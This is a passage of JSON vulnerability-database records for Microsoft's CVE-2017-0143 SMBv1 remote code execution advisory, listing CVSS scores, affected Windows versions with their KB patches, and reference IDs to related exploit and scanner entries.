"kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 